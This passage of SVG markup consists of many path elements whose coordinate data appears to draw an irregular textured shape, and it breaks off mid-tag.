d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path 